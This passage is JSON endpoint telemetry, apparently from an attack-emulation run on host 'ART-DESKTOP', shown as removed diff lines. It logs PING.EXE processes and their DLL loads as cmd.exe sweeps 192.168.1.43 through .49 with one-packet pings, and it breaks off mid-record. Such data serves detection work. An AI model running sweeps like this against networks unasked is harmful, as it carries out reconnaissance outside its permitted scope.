"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "process", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572191990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.43", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2448, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572192130000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "process", - 
"pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572196830000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.44", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572196980000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - 
"unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "process", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572197450016, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.45", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4996, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572197670000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": 
"{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197770000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "process", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572201830000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.46", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7180, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572201980000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "process", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572206990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.47", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7264, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "process", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572211840000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.48", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4136, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572211980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4136, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "process", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572216830000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.49", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3952, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - 
